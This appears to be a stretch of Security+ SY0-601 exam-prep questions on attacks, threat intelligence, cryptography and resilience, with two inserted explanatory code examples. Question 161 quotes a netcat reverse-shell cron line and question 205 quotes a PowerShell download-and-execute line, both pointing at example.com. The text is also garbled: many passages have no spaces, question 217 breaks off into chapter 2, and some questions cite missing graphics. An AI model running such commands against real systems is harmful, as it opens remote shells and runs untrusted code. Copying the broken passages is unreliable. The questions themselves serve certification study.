154. Yourcompanyhashiredapenetrationtestingfirmtotestthenetwork.Forthetest,youhavegiventhecompanydetailsonoperatingsystemsyouuse,applicationsyourun,andnetworkdevices.Whatbestdescribesthistypeoftest?
A. Knownenvironmenttest
B. Externaltest
C. Unknownenvironmenttest
D. Threattest
155. Whattwofilesarecommonlyattackedusingofflinebrute-forceattacks?
A. TheWindowsregistryandtheLinux/etc/passwdfile
B. TheWindowsSAMandtheLinux/etc/passwdfile
C. TheWindowsSAMandtheLinux/etc/shadowfile
D. TheWindowsregistryandtheLinux/etc/shadowfile
156. WhattypeofattackisanSSLstrippingattack?
A. Abrute-forceattack
B. ATrojanattack
C. Anon-pathattack
D. Adowngradeattack
157. WhattypeofattackistheU.S.TrustedFoundryprogramintendedtohelpprevent?
A. Criticalinfrastructureattacks
B. Metalworkandcastingattacks
C. Supplychainattacks
D. Softwaresourcecodeattacks
Telegram Channel @nettrain
158. Nicolewantstoshowthemanagementinherorganizationreal-timedataaboutattacksfromaroundtheworldviamultipleserviceprovidersinavisualway.Whattypeofthreatintelligencetoolisoftenusedforthispurpose?
A. Apiechart
B. Athreatmap
C. Adarkwebtracker
D. AnOSINTrepository
159. Youhavenoticedthatwheninacrowdedarea,datafromyourcellphoneisstolen.LaterinvestigationshowsaBluetoothconnectiontoyourphone,onethatyoucannotexplain.Whatdescribesthisattack?
A. Bluejacking
B. Bluesnarfing
C. Eviltwin
D. RAT
160. Thetypeandscopeoftesting,clientcontactdetails,howsensitivedatawillbehandled,andthetypeandfrequencyofstatusmeetingsandreportsareallcommonelementsofwhatartifactofapenetrationtest?
A. Theblack-boxoutline
B. Therulesofengagement
C. Thewhite-boxoutline
D. Theclose-outreport
161. AmandaencountersaBashscriptthatrunsthefollowingcommand:
crontab-e0****ncexample.com8989-e/bin/bash
Whatdoesthiscommanddo?
A. Itchecksthetimeeveryhour.
B. Itpullsdatafromexample.comeveryminute.
C. Itsetsupareverseshell.
D. Noneoftheabove
Telegram Channel @nettrain
162. A penetration tester called a help desk staff member at the company that Charles works at and claimed to be a senior executive who needed her password changed immediately due to an important meeting they needed to conduct that would start in a few minutes. The staff member changed the executive's password to a password that the penetration tester provided. What social engineering principle did the penetration tester leverage to accomplish this attack?
A. Intimidation
B. Scarcity
C. Urgency
D. Trust
163. Patrick has subscribed to a commercial threat intelligence feed that is only provided to subscribers who have been vetted and who pay a monthly fee. What industry term is used to refer to this type of threat intelligence?
A. Proprietary threat intelligence
B. OSINT
C. ELINT
D. Corporate threat intelligence
164. What threat hunting concept involves thinking like a malicious actor to help identify indicators of compromise that might otherwise be hidden?
A. Intelligence fusion
B. Maneuver
C. Threat feed analysis
D. Bulletin analysis
165. What type of malicious actor will typically have the least amount of resources available to them?
A. Nation-states
B. Script kiddies
C. Hacktivists
D. Organized crime
166. A SYN flood seeks to overwhelm a system by tying up all the open sessions that it can create. What type of attack is this?
A. A DDoS
B. A resource exhaustion attack
C. An application exploit
D. A vulnerability exploit
167. A penetration tester calls a staff member for her target organization and introduces herself as a member of the IT support team. She asks if the staff member has encountered a problem with their system, then proceeds to ask for details about the individual, claiming she needs to verify that she is talking to the right person. What type of social engineering attack is this?
A. Pretexting
B. A watering hole attack
C. Prepending
D. Shoulder surfing
168. What term describes the use of airplanes or drones to gather network or other information as part of a penetration test or intelligence gathering operation?
A. Droning
B. AirSnarfing
C. Warflying
D. Aerial snooping
169. Gabby wants to protect a legacy platform with known vulnerabilities. Which of the following is not a common option for this?
A. Disconnect it from the network.
B. Place the device behind a dedicated firewall and restrict inbound and outbound traffic.
C. Rely on the outdated OS to confuse attackers.
D. Move the device to a protected VLAN.
170. In the United States, collaborative industry organizations that analyze and share cybersecurity threat information within their industry verticals are known by what term?
A. IRTs
B. ISACs
C. Feedburners
D. Vertical threat feeds
171. After running nmap against a system on a network, Lucca sees that TCP port 23 is open and a service is running on it. What issue should he identify?
A. Low ports should not be open to the Internet.
B. Telnet is an insecure protocol.
C. SSH is an insecure protocol.
D. Ports 1-1024 are well-known ports and must be firewalled.
172. During a penetration test, Cameron gains physical access to a Windows system and uses a system repair disk to copy cmd.exe to the %systemroot%\system32 directory while renaming it sethc.exe. When the system boots, he is able to log in as an unprivileged user, hit the Shift key five times, and open a command prompt with system-level access using sticky keys. What type of attack has he conducted?
A. A Trojan attack
B. A privilege escalation attack
C. A denial-of-service attack
D. A swap file attack
173. Adam wants to describe threat actors using common attributes. Which of the following is not a common attribute used to describe threat actors?
A. Internal/external
B. Resources or funding level
C. Years of experience
D. Intent/motivation
174. Madhuri is concerned about the security of the machine learning algorithms that her organization is deploying. Which of the following options is not a common security precaution for machine learning algorithms?
A. Ensuring the source data is secure and of sufficient quality
B. Requiring a third-party review of all proprietary algorithms
C. Requiring change control and documentation for all changes to the algorithms
D. Ensuring a secure environment for all development, data acquisition, and storage
175. Frank is part of a white team for a cybersecurity exercise. What role will he and his team have?
A. Performing oversight and judging of the exercise
B. Providing full details of the environment to the participants
C. Providing partial details of the environment to the participants
D. Providing defense against the attackers in the exercise
176. Susan receives $10,000 for reporting a vulnerability to a vendor who participates in a program to identify issues. What term is commonly used to describe this type of payment?
A. A ransom
B. A payday
C. A bug bounty
D. A zero-day disclosure
177. Charles sets the permissions on the /etc directory on a Linux system to 777 using the chmod command. If Alex later discovers this, what should he report his finding as?
A. Open or weak permissions
B. Improper file handling
C. A privilege escalation attack
D. None of the above
178. During a penetration test, Kathleen gathers information, including the organization's domain name, IP addresses, employee information, phone numbers, email addresses, and similar data. What is this process typically called?
A. Mapping
B. Footprinting
C. Fingerprinting
D. Aggregation
179. What term is used to describe mapping wireless networks while driving?
A. Wi-driving
B. Traffic testing
C. Wardriving
D. CARINT
180. Fred discovers that the lighting and utility control systems for his company have been overwhelmed by traffic sent to them from hundreds of external network hosts. This has resulted in the lights and utility system management systems not receiving appropriate reporting, and the endpoint devices cannot receive commands. What type of attack is this?
A. A SCADA overflow
B. An operational technology (OT) DDoS
C. A network DDoS
D. An application DDoS
181. Ben runs a vulnerability scan using up-to-date definitions for a system that he knows has a vulnerability in the version of Apache that it is running. The vulnerability scan does not show that issue when he reviews the report. What has Ben encountered?
A. A silent patch
B. A missing vulnerability update
C. A false negative
D. A false positive
182. What type of technique is commonly used by malware creators to change the signature of malware to avoid detection by antivirus tools?
A. Refactoring
B. Cloning
C. Manual source code editing
D. Changing programming languages
183. What term describes a military strategy for political warfare that combines conventional warfare, irregular warfare, and cyberwarfare with fake news, social media influence strategies, diplomatic efforts, and manipulation of legal activities?
A. Social warfare
B. Hybrid warfare
C. Social influence
D. Cyber social influence campaigns
184. Chris is notified that one of his staff was warned via a text message that the FBI is aware that they have accessed illegal websites. What type of issue is this?
A. A phishing attempt
B. Identity fraud
C. A hoax
D. An invoice scam
185. Sarah is reviewing the logs for her web server and sees an entry flagged for review that includes the following HTTP request:
Check in stock API=http://localhost/admin.php
What type of attack is most likely being attempted?
A. A cross-site scripting attack
B. Server-side request forgery
C. Client-side request forgery
D. SQL injection
186. Angela reviews bulletins and advisories to determine what threats her organization is likely to face. What type of activity is this associated with?
A. Incident response
B. Threat hunting
C. Penetration testing
D. Vulnerability scanning
187. Why do attackers target passwords stored in memory?
A. They are encrypted in memory.
B. They are hashed in memory.
C. They are often in plain text.
D. They are often de-hashed for use.
188. The U.S. Department of Homeland Security (DHS) provides an automated indicator sharing (AIS) service that allows for the federal government and private sector organizations to share threat data in real time. The AIS service uses open source protocols and standards to exchange this information. Which of the following standards does the AIS service use?
A. HTML and HTTPS
B. SFTP and XML
C. STIX and TRIX
D. STIX and TAXII
189. During what phase of a penetration test is information like employee names, phone numbers, and email addresses gathered?
A. Exploitation
B. Establishing persistence
C. Reconnaissance
D. Lateral movement
190. During a penetration test, Angela obtains the uniform of a well-known package delivery service and wears it into the target office. She claims to have a delivery for a C-level employee she knows is there and insists that the package must be signed for by that person. What social engineering technique has she used?
A. Impersonation
B. Whaling
C. A watering hole attack
D. Prepending
191. Nick purchases his network devices through a gray market supplier that imports them into his region without an official relationship with the network device manufacturer. What risk should Nick identify when he assesses his supply chain risk?
A. Lack of vendor support
B. Lack of warranty coverage
C. Inability to validate the source of the devices
D. All of the above
192. Christina wants to identify indicators of attack for XML-based web applications that her organization runs. Where is she most likely to find information that can help her determine whether XML injection is occurring against her web applications?
A. Syslog
B. Web server logs
C. Authentication logs
D. Event logs
193. What can Frank do to determine if he is suffering from a denial-of-service (DoS) attack against his cloud hosting environment?
A. Nothing; cloud services do not provide security tools.
B. Call the cloud service provider to have them stop the DoS attack.
C. Review the cloud service provider's security tools and enable logging and anti-DoS tools if they exist.
D. Call the cloud service provider's Internet service provider (ISP) and ask them to enable DoS prevention.
194. Frank is using the cloud hosting service's web publishing service rather than running his own web servers. Where will Frank need to look to review his logs to see what types of traffic his application is creating?
A. Syslog
B. Apache logs
C. The cloud service's web logs
D. None of the above
195. If Frank were still operating in his on-site infrastructure, which of the following technologies would provide the most insight into what type of attack he was seeing?
A. A firewall
B. An IPS
C. A vulnerability scanner
D. Antimalware software
196. Alaina wants to ensure that the on-site system integration performed by a vendor that her company is working with is done in accordance with industry best practices. Which of the following is not a common method of ensuring this?
A. Inserting security requirements into contracts
B. Auditing configurations
C. Coordinating with the vendor for security reviews during and after installation
D. Requiring an SOC report
197. Elias has implemented an AI-based network traffic analysis tool that requires him to allow the tool to monitor his network for a period of two weeks before being put into full production. What is the most significant concern he needs to address before using the AI's baselining capabilities?
A. The network should be isolated to prevent outbound traffic from being added to the normal traffic patterns.
B. Compromised or otherwise malicious machines could be added to the baseline, resulting in tainted training data.
C. Traffic patterns may not match traffic throughout a longer time frame.
D. The AI may not understand the traffic flows in his network.
198. What is the typical intent or goal of hacktivists?
A. Increasing their reputation
B. Financial gain
C. Making a political statement
D. Gathering high-value data
199. Where does the information for predictive analysis for threat intelligence come from?
A. Current security trends
B. Large security datasets
C. Behavior patterns
D. All of the above
200. Social Security numbers and other personal information are often stolen for what purpose?
A. Blackmail
B. Tailgating
C. Identity fraud
D. Impersonation
201. Security orchestration, automation, and response (SOAR) tools have three major components. Which of the following is not one of those components?
A. Source code security analysis and testing
B. Threat and vulnerability management
C. Security incident response
D. Security operations automation
202. Direct access, wireless, email, supply chain, social media, removable media, and cloud are all examples of what?
A. Threat intelligence sources
B. Threat vectors
C. Attributes of threat actors
D. Vulnerabilities
203. SourceForge and GitHub are both examples of what type of threat intelligence source?
A. The dark web
B. Automated indicator sharing sources
C. File or code repositories
D. Public information sharing centers
204. What is the root cause of improper input handling?
A. Improper error handling
B. Trusting rather than validating data inputs
C. Lack of user awareness
D. Improper source code review
205. Claire discovers the following PowerShell script. What does it do?
powershell.exe -ep Bypass -nop -noexit -c iex ((New-Object Net.WebClient).DownloadString('https://example.com/file.ps1'))
A. Downloads a file and opens a remote shell
B. Uploads a file and deletes the local copy
C. Downloads a file into memory
D. Uploads a file from memory
206. Kathleen's IPS flags traffic from two IP addresses as shown here:
Source IP: 10.11.94.111
http://example.com/home/show.php?SESSIONID=a3fghbby
Source IP: 192.168.5.34
http://example.com/home/show.php?SESSIONID=a3fghbby
What type of attack should she investigate this as?
A. A SQL injection attack
B. A cross-site scripting attack
C. A session replay attack
D. A server-side request forgery attack
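The pattern behind the IPS alert in question 206 is one session token presented from more than one source address. The following detector is an added example, not code from the book: it parses constructed records of the same shape as the two flagged entries (source IP, a tab, the requested URL) and reports every session ID seen from two or more source IPs. The record layout, the sample lines and the function names are this example's own assumptions.

```python
"""Added example (not from the book): flag a session token presented from
more than one source IP, the pattern behind the IPS alert in question 206.
The record layout (source IP, tab, URL) and sample records are constructed."""
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Constructed sample records, modelled on the two flagged entries above plus
# two benign lines so the detector has something to ignore.
SAMPLE_RECORDS = """\
10.11.94.111\thttp://example.com/home/show.php?SESSIONID=a3fghbby
192.168.5.34\thttp://example.com/home/show.php?SESSIONID=a3fghbby
10.11.94.111\thttp://example.com/home/show.php?SESSIONID=zz91k0pq
172.16.4.9\thttp://example.com/home/index.php
"""


def session_id_from_url(url: str, param: str = "SESSIONID"):
    """Return the session token carried in the URL's query string, or None."""
    values = parse_qs(urlparse(url).query).get(param)
    return values[0] if values else None


def sessions_by_source(records: str):
    """Map each session token to the set of source IPs that presented it."""
    seen = defaultdict(set)
    for line in records.splitlines():
        if not line.strip():
            continue
        src_ip, url = line.split("\t", 1)
        token = session_id_from_url(url)
        if token:
            seen[token].add(src_ip)
    return seen


def find_shared_sessions(records: str):
    """Tokens seen from more than one source IP: candidates for session
    replay or hijacking. Returns {token: sorted list of source IPs}."""
    return {
        token: sorted(ips)
        for token, ips in sessions_by_source(records).items()
        if len(ips) > 1
    }


if __name__ == "__main__":
    for token, ips in find_shared_sessions(SAMPLE_RECORDS).items():
        print(f"session {token} presented by {len(ips)} sources: {', '.join(ips)}")
```

A shared token is a lead, not a verdict: users behind a NAT gateway or a forward proxy legitimately change source addresses, so the finding is worth correlating with timing, User-Agent and geography before the session is invalidated.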
207. There are seven impact categories that you need to know for the Security+ exam. Which of the following is not one of them?
A. Data breaches
B. Data modification
C. Data exfiltration
D. Data loss
208. Which of the following research sources is typically the least timely when sourcing threat intelligence?
A. Vulnerability feeds
B. Local industry groups
C. Academic journals
D. Threat feeds
209. While reviewing auth logs on a server that she maintains, Megan notices the following log entries:
Apr 26 20:01:32 examplesys rshd[6101]: Connection from 10.0.2.15 on illegal port
Apr 26 20:01:48 examplesys rshd[6117]: Connection from 10.0.2.15 on illegal port
Apr 26 20:02:02 examplesys rshd[6167]: Connection from 10.0.2.15 on illegal port
Apr 26 20:02:09 examplesys rshd[6170]: Connection from 10.0.2.15 on illegal port
Apr 26 20:02:09 examplesys rshd[6172]: Connection from 10.0.2.15 on illegal port
Apr 26 20:02:35 examplesys rshd[6188]: Connection from 10.0.2.15 on illegal port
Apr 26 20:02:35 examplesys rlogind[6189]: Connection from 10.0.2.15 on illegal port
What has she most likely detected?
A. A successful hacking attempt
B. A failed service startup
C. A vulnerability scan
D. A system reboot
210. The following graphic shows a report from an OpenVAS vulnerability scan. What should Charles do first to determine the best fix for the vulnerability shown?
A. Disable PHP-CGI.
B. Upgrade PHP to version 5.4.
C. Review the vulnerability descriptions in the CVEs listed.
D. Disable the web server.
211. Ian runs a vulnerability scan, which notes that a service is running on TCP port 8080. What type of service is most likely running on that port?
A. SSH
B. RDP
C. MySQL
D. HTTP
212. Rick runs WPScan against a potentially vulnerable WordPress installation. WPScan is a web application security scanner designed specifically for WordPress sites. As part of the scan results, he notices the following entry:
What should Rick do after remediating this vulnerability?
A. Install a web application firewall.
B. Review the patching and updating process for the WordPress system.
C. Search for other compromised systems.
D. Review IPS logs for attacks against the vulnerable plug-in.
213. Carolyn runs a vulnerability scan of a network device and discovers that the device is running services on TCP ports 22 and 443. What services has she most likely discovered?
A. Telnet and a web server
B. FTP and a Windows file share
C. SSH and a web server
D. SSH and a Windows file share
214. Ryan needs to verify that no unnecessary ports and services are available on his systems, but he cannot run a vulnerability scanner. What is his best option?
A. Passive network traffic capture to detect services
B. A configuration review
C. Active network traffic capture to detect services
D. Log review
215. Why is improper error handling for web applications that results in displaying error messages considered a vulnerability that should be remediated?
A. Errors can be used to crash the system.
B. Many errors result in race conditions that can be exploited.
C. Many errors provide information about the host system or its configuration.
D. Errors can change system permissions.
216. Some users on your network use Acme Bank for their personal banking. Those users have all recently been the victim of an attack, in which they visited a fake Acme Bank website and their logins were compromised. They all visited the bank website from your network, and all of them insist they typed in the correct URL. What is the most likely explanation for this situation?
A. Trojan horse
B. IP spoofing
C. Clickjacking
D. DNS poisoning
217. John is a network administrator for Acme Company. He has discovered that someone has registered a domain name that is spelled just one letter different than his company's domain. The website with the misspelled URL is a phishing site. What best describes this attack?
A. Session hijacking
Chapter 2: Architecture and Design
THE COMPTIA SECURITY+ EXAM SY0-601 TOPICS COVERED IN THIS CHAPTER INCLUDE THE FOLLOWING:
2.1 Explain the importance of security concepts in an enterprise environment
2.2 Summarize virtualization and cloud computing concepts
2.3 Summarize secure application development, deployment, and automation concepts
2.4 Summarize authentication and authorization design concepts
2.5 Given a scenario, implement cybersecurity resilience
2.6 Explain the security implications of embedded and specialized systems
2.7 Explain the importance of physical security controls
2.8 Summarize the basics of cryptographic concepts
1. Ben is reviewing configuration management documentation for his organization and finds the following diagram in his company's document repository. What key information is missing from the diagram that a security professional would need to build firewall rules based on the diagram?
A. The subnet mask
B. The service name
C. The protocol the traffic uses
D. The API key
2. You are responsible for network security at an e-commerce company. You want to ensure that you are using best practices for the e-commerce website your company hosts. What standard would be the best for you to review?
A. OWASP
B. NERC
C. Trusted Foundry
D. ISA/IEC
3. Cheryl is responsible for cybersecurity at a mid-sized insurance company. She has decided to use a different vendor for network antimalware than she uses for host antimalware. Is this a recommended action, and why or why not?
A. This is not recommended; you should use a single vendor for a particular security control.
B. This is recommended; this is described as vendor diversity.
C. This is not recommended; this is described as vendor forking.
D. It is neutral. This does not improve or detract from security.
4. Scott wants to back up the contents of a network-attached storage (NAS) device used in a critical department in his company. He is concerned about how long it would take to restore the device if a significant failure happened, and he is less concerned about the ability to recover in the event of a natural disaster. Given these requirements, what type of backup should he use for the NAS?
A. A tape-based backup with daily full backups
B. A second NAS device with a full copy of the primary NAS
C. A tape-based backup with nightly incremental backups
D. A cloud-based backup service that uses high durability near-line storage
5. Yasmine is responding to a full data center outage, and after referencing the documentation for the systems in the data center she brings the network back up, then focuses on the storage area network (SAN), followed by the database servers. Why does her organization list systems for her to bring back online in a particular series?
A. The power supply for the building cannot handle all the devices starting at once.
B. The organization wants to ensure that a second outage does not occur due to failed systems.
C. The organization wants to ensure that systems are secure and have the resources they need by following a restoration order.
D. The fire suppression system may activate due to the sudden change in heat, causing significant damage to the systems.
6. Enrique is concerned about backup data being infected by malware. The company backs up key servers to digital storage on a backup server. Which of the following would be most effective in preventing the backup data being infected by malware?
A. Place the backup server on a separate VLAN.
B. Air-gap the backup server.
C. Place the backup server on a different network segment.
D. Use a honeynet.
7. What type of attribute is a Windows picture password?
A. Somewhere you are
B. Something you exhibit
C. Something you can do
D. Someone you know
8. Which of the following is not a critical characteristic of a hash function?
A. It converts variable-length input into a fixed-length output.
B. Multiple inputs should not hash to the same output.
C. It must be reversible.
D. It should be fast to compute.
9. Naomi wants to hire a third-party secure data destruction company. What process is most frequently used to ensure that third parties properly perform data destruction?
A. Manual on-site inspection by federal inspectors
B. Contractual requirements and a certification process
C. Requiring pictures of every destroyed document or device
D. All of the above
10. Olivia wants to ensure that the code executed as part of her application is secure from tampering and that the application itself cannot be tampered with. Which of the following solutions should she use and why?
A. Server-side execution and validation, because it prevents data and application tampering
B. Client-side validation and server-side execution to ensure client data access
C. Server-side validation and client-side execution to prevent data tampering
D. Client-side execution and validation, because it prevents data and application tampering
11. Trevor wants to use an inexpensive device to build a custom embedded system that can monitor a process. Which of the following options is best suited for this if he wants to minimize expense and maximize simplicity while avoiding the potential for system or device compromise?
A. A Raspberry Pi
B. A custom FPGA
C. A repurposed desktop PC
D. An Arduino
12. Amanda wants to use a digital signature on an email she is sending to Maria. Which key should she use to sign the email?
A. Maria's public key
B. Amanda's public key
C. Maria's private key
D. Amanda's private key
13. Nick wants to make an encryption key harder to crack, and he increases the key length by one bit from a 128-bit encryption key to a 129-bit encryption key as an example to explain the concept. How much more work would an attacker have to do to crack the key using brute force if no other attacks or techniques could be applied?
A. One more
B. 129 more
C. Twice as much
D. Four times as much
14. Gurvinder knows that the OpenSSL passwd file protects passwords by using 1,000 rounds of MD5 hashing to help protect password information. What is this technique called?
A. Spinning the hash
B. Key rotation
C. Key stretching
D. Hash iteration
15. Fred wants to make it harder for an attacker to use rainbow tables to attack the hashed password values he stores. What should he add to every password before it is hashed to make it impossible for the attacker to simply use a list of common hashed passwords to reveal the passwords Fred has stored if they gain access to them?
A. A salt
B. A cipher
C. A spice
D. A trapdoor
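Questions 14 and 15 describe two separate defenses for stored passwords: repeated hashing (key stretching) and a per-password salt. The script below is an added example, not code from the book, that shows both effects on constructed inputs: a precomputed table of unsalted digests reverses a common password instantly, the same password hashed under two salts gives two unrelated digests that the table cannot match, and the PBKDF2 iteration count is the stretching factor an attacker must repeat for every guess. The candidate password list, the fixed salts used in the demonstration and the function names are this example's own.

```python
"""Added example (not from the book): a salt defeats a precomputed table of
common password hashes, and iteration (key stretching) slows every guess.
All inputs are constructed; function names are this example's own."""
import hashlib
import hmac
import os


def unsalted_hash(password: str) -> str:
    """Plain SHA-256 of the password: the same password always yields the
    same digest, so a precomputed table can look it up directly."""
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(password: str, salt: bytes, iterations: int = 100_000) -> str:
    """PBKDF2-HMAC-SHA256: the salt makes each stored digest unique, and the
    iteration count is the key-stretching work an attacker repeats per guess."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


def new_salt(length: int = 16) -> bytes:
    """Per-password random salt from the operating system CSPRNG."""
    return os.urandom(length)


def build_lookup_table(candidates):
    """Attacker-side precomputation: unsalted digest -> password."""
    return {unsalted_hash(p): p for p in candidates}


def lookup(table, digest):
    """Reverse a digest if it appears in the precomputed table, else None."""
    return table.get(digest)


def verify(password: str, salt: bytes, iterations: int, stored_digest: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    return hmac.compare_digest(salted_hash(password, salt, iterations), stored_digest)


if __name__ == "__main__":
    table = build_lookup_table(["password", "letmein", "qwerty"])  # constructed list
    print("unsalted lookup:", lookup(table, unsalted_hash("password")))  # reversed
    salt = new_salt()
    stored = salted_hash("password", salt)
    print("salted lookup:", lookup(table, stored))  # None: table is useless
    print("verify:", verify("password", salt, 100_000, stored))
```

The salt is stored beside the digest in the clear; its job is uniqueness, not secrecy, so that a table built once cannot be reused against every account. The iteration count should be tuned to the login server's hardware and raised over time as hardware gets faster.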
16. Ian wants to send an encrypted message to Michelle using public key cryptography. What key does he need to encrypt the message?
A. His public key
B. His private key
C. Her public key
D. Her private key
17. What key advantage does an elliptical curve cryptosystem have over an RSA-based cryptosystem?
A. It can use a smaller key length for the same resistance to being broken.
B. It requires only a single key to encrypt and decrypt.
C. It can run on older processors.
D. It can be used for digital signatures as well as encryption.
18. What cryptographic capability ensures that even if the server's private key is compromised, the session keys will not be compromised?
A. Perfect forward secrecy
B. Symmetric encryption
C. Quantum key rotation
D. Diffie-Hellman key modulation
19. Alaina is reviewing practices for her reception desk and wants to ensure that the reception desk's visitor log is accurate. What process should she add to the guard's check-in procedure?
A. Check the visitor's ID against their logbook entry.
B. Perform a biometric scan to validate visitor identities.
C. Require two-person integrity control.
D. Replace the guard with a security robot.
20. In an attempt to observe hacker techniques, a security administrator configures a nonproduction network to be used as a target so that he can covertly monitor network attacks. What is this type of network called?
A. Active detection
B. False subnet
C. IDS
D. Honeynet
21. What type of system is used to control and monitor power plant power generation systems?
A. IPG
B. SEED
C. SCADA
D. ICD
22. What major technical component of modern cryptographic systems is likely to be susceptible to quantum attacks?
A. Key generation
B. Elliptical plot algorithms
C. Cubic root curve cryptography
D. Prime factorization algorithms
23. Geoff wants to establish a contract with a company to have data center space that is equipped and ready to go so that he can bring his data to the location in the event of a disaster. What type of disaster recovery site is he looking for?
A. A hot site
B. A cold site
C. A warm site
D. An RTO site
24. Olivia needs to ensure an IoT device does not have its operating system modified by third parties after it is sold. What solution should she implement to ensure that this does not occur?
A. Set a default password.
B. Require signed and encrypted firmware.
C. Check the MD5 sum for new firmware versions.
D. Patch regularly.
25. What statement is expected to be true for a post-quantum cryptography world?
A. Encryption speed will be measured in qubits.
B. Nonquantum cryptosystems will no longer be secure.
C. Quantum encryption will no longer be relevant.
D. Key lengths longer than 4,096 bits using RSA will be required.
26. What function does counter mode perform in a cryptographic system?
A. It reverses the encryption process.
B. It turns a block cipher into a stream cipher.
C. It turns a stream cipher into a block cipher.
D. It allows public keys to unlock private keys.
27. Which of the following items is not included in a blockchain's public ledger?
A. A record of all genuine transactions between network participants
B. A record of cryptocurrency balances (or other data) stored in the blockchain
C. The identity of the blockchain participants
D. A token that identifies the authority under which the transaction was made
28. Suzan is responsible for application development in her company. She wants to have all web applications tested before they are deployed live. She wants to use a test system that is identical to the live server. What is this called?
A. A production server
B. A development server
C. A test server
D. A predeployment server
29. Alexandra is preparing to run automated security tests against the code that developers in her organization have completed. Which environment is she most likely to run them in if the next step is to deploy the code to production?
A. Development
B. Test
C. Staging
D. Production
30. Chris wants to limit who can use an API that his company provides and be able to log usage of the API uniquely to each organization that they provide access to. What solution is most often used to do this?
A. Firewalls with rules for each company's public IP address
B. User credentials for each company
C. API keys
D. API passwords
31. Derek has been assigned to assess the security of smart meters. Which of the following is not a common concern for an embedded system like a smart meter?
A. Eavesdropping
B. Denial of service
C. Remote disconnection
D. SQL injection
32. Selah wants to analyze real-world attack patterns against systems similar to what she already has deployed in her organization. She would like to see local commands on a compromised system and have access to any tools or other materials the attackers would normally deploy. What type of technology could she use to do this?
A. A honeypot
B. An IPS
C. An IDS
D. A WAF
33. Charles sets up a network with intentional vulnerabilities and then instruments it so that he can watch attackers and capture details of their attacks and techniques. What has Charles set up?
A. A black hole
B. A honey hole
C. A spynet
D. A honeynet
34. Maria is a security engineer with a manufacturing company. During a recent investigation, she discovered that an engineer's compromised workstation was being used to connect to SCADA systems while the engineer was not logged in. The engineer is responsible for administering the SCADA systems and cannot be blocked from connecting to them. What should Maria do to mitigate this threat?
A. Install host-based antivirus software on the engineer's system.
B. Implement account usage auditing on the SCADA system.
C. Implement an NIPS on the SCADA system.
D. Use FDE on the engineer's system.
35. AES and DES are examples of what type of cipher?
A. Stream ciphers that encrypt groups of plain-text symbols all together
B. Block ciphers that encrypt groups of plain-text symbols all together
C. Stream ciphers that encrypt one plain-text symbol at a time
D. Block ciphers that encrypt one plain-text symbol at a time
36. Gerard is responsible for secure communications with his company's e-commerce server. All communications with the server use TLS. What is the most secure option for Gerard to store the private key on the e-commerce server?
A. HSM
B. FDE
C. SED
D. SDN
37. What purpose does a transit gateway serve in cloud services?
A. It connects systems inside of a cloud data center.
B. It connects virtual private clouds and on-premises networks.
C. It provides an API gateway between trust zones.
D. It allows multicloud infrastructure designs.
38. Web developers in your company currently have direct access to the production server and can deploy code directly to it. This can lead to unsecure code, or simply code flaws, being deployed to the live system. What would be the best change you could make to mitigate this risk?
A. Implement sandboxing.
B. Implement virtualized servers.
C. Implement a staging server.
D. Implement deployment policies.
39. Ian is concerned about VoIP phones used in his organization due to the use of SMS as part of their multifactor authentication rollout. What type of attack should he be concerned about?
A. A vishing attack
B. A voicemail hijack
C. An SMS token redirect
D. A weak multifactor code injection
40. Angela wants to ensure that IoT devices in her organization have a secure configuration when they are deployed and that they are ready for further configuration for their specific purposes. What term is used to describe these standard configurations used as part of her configuration management program?
A. A baseline configuration
B. An essential settings list
C. A preinstall checklist
D. A setup guide
41. Why is heating, ventilation, and air-conditioning (HVAC) part of organizational security planning?
A. Attackers often use HVAC systems as part of social engineering exercises.
B. HVAC systems are important for availability.
C. HVAC systems are a primary line of network defense.
D. None of the above
42. What advantage does symmetric encryption have over asymmetric encryption?
A. It is more secure.
B. It is faster.
C. It can use longer keys.
D. It simplifies key distributions.
43. Laura knows that predictability is a problem in pseudo-random number generators (PRNGs) used for encryption operations. What term describes the measure of uncertainty used for a PRNG?
A. Ellipses
B. Quantum flux
C. Entropy
D. Primeness
44. Which cloud service model gives the consumer the ability to use applications provided by the cloud provider over the Internet?
A. SaaS
B. PaaS
C. IaaS
D. Hybrid
45. Chris sets a resource policy in his cloud environment. What type of control does this allow him to exert?
A. It allows him to determine how much disk space can be used.
B. It allows him to determine how much bandwidth can be used.
C. It allows him to specify who has access to resources and what actions they can perform on it.
D. It allows him to specify what actions a resource can take on specific users.
46. Chris sets up SAN replication for his organization. What has he done?
A. He has enabled RAID 1 to ensure that the SAN cannot lose data if a drive fails because the drives are replicated.
B. He has set up backups to a tape library for the SAN to ensure data resilience.
C. He has built a second identical set of hardware for his SAN.
D. He has replicated the data on one SAN to another at the block or hardware level.
47. Mike is a security analyst and has just removed malware from a virtual server. What feature of virtualization would he use to return the virtual server to a last known good state?
A. Sandboxing
B. Hypervisor
C. Snapshot
D. Elasticity
48. Lisa is concerned about fault tolerance for her database server. She wants to ensure that if any single drive fails, it can be recovered. What RAID level would support this goal while using distributed parity bits?
A. RAID 0
B. RAID 1
C. RAID 3
D. RAID 5
49. Jarod is concerned about EMI affecting a key escrow server. Which method would be most effective in mitigating this risk?
A. VLAN
B. SDN
C. Trusted platform module
D. Faraday cage
50. John is responsible for physical security at his company. He is particularly concerned about an attacker driving a vehicle into the building. Which of the following would provide the best protection against this threat?
A. A gate
B. Bollards
C. A security guard on duty
D. Security cameras
51. Mark is responsible for cybersecurity at a small college. There are many computer labs that are open for students to use. These labs are monitored only by a student worker, who may or may not be very attentive. Mark is concerned about the theft of computers. Which of the following would be the best way for him to mitigate this threat?
A. Cable locks
B. FDE on the lab computers
C. Strong passwords on the lab computers
D. Having a lab sign-in sheet
52. Joanne is responsible for security at a power plant. The facility is very sensitive and security is extremely important. She wants to incorporate two-factor authentication with physical security. What would be the best way to accomplish this?
A. Smart cards
B. A mantrap with a smart card at one door and a PIN keypad at the other door
C. A mantrap with video surveillance
D. A fence with a smart card gate access
53. Which of the following terms refers to the process of establishing a standard for security?
A. Baselining
B. Security evaluation
C. Hardening
D. Normalization
54. Angelaconfiguresahoneypottoongoingeventslikeuserloginsandlogouts,diskusage,programandscriptloads,andsimilarinformation.
Telegram Channel @nettrain
Whatisthistypeofdeceptioncalled?
A. Faketelemetry
B. Useremulation
C. Honeyfakes
D. Deepfakes
55. WhichlevelofRAIDisa“stripeofmirrors”?
A. RAID1+0
B. RAID6
